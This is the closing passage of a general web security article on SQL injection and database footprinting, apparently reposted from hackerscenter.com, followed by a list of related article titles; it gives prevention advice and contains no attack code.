It attempts to modify the parameters of a Web -based application in order to alter the SQL statements that are parsed to retrieve data from the database. Database footprinting is the process of mapping out the tables on the database and is a crucial tool in the hands of an attacker. Exploits occur due to coding errors as well as inadequate validation checks. Prevention involves enforcing better coding practices and database administration procedures. You have finally read this article and I hope, it gave you a deeper understanding about today web security and attacks. Remember always patch and update holes because exploits are found commonly and the attacker is not going to wait. Thank you all for reading and continue to show your support to Hackers Centre by spreading good word about our site!

Sumber : http://www.hackerscenter.com

Read More..

Oracle Sql Tuning

Xpath Injection

SQL injection exploitation internals

Blind Sql Injection

Chema Alonso Blind Sql Injection Taller

Hacking With Sql Injection Exposed - A Research Thesis

Time-Based Blind SQL Injection using Heavy Queries

Joseph McCray - Advanced SQL Injection

Sql Injection Attacks Siddhesh

Hackers Paradise SQL Injection Attacks

Blind SQL Injection - Optimization Techniques

SQL injection: Not only AND 1=1